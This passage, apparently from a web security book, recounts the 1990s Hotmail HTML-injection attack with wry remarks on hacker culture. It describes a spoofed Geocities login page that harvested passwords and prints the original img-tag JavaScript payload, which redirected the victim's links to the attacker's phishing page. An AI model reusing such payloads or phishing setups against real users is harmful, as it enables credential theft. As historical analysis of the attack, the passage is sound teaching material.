    The discoverers, in apparent ignorance of the 1990’s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They also neglected the era’s disclosure methodologies by omitting greetz, lacking typos, and failing to remind the reader of near-omnipotent skills – surely an anomaly at the time. The hacker did not fail on all aspects. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

    The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

    The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

    The second step involved executing the actual exploit against Hotmail by sending an email with HTML that contained a rather curious img tag:

    <img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
    nomenulinks=top.submenu.document.links.length;
    for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='work';
    top.submenu.document.links[i].href=errurl;}
    noworklinks=top.work.document.links.length;
    for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='work';
    top.work.document.links[i].href=errurl;}">
    

    The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant attack against web applications.

    * * *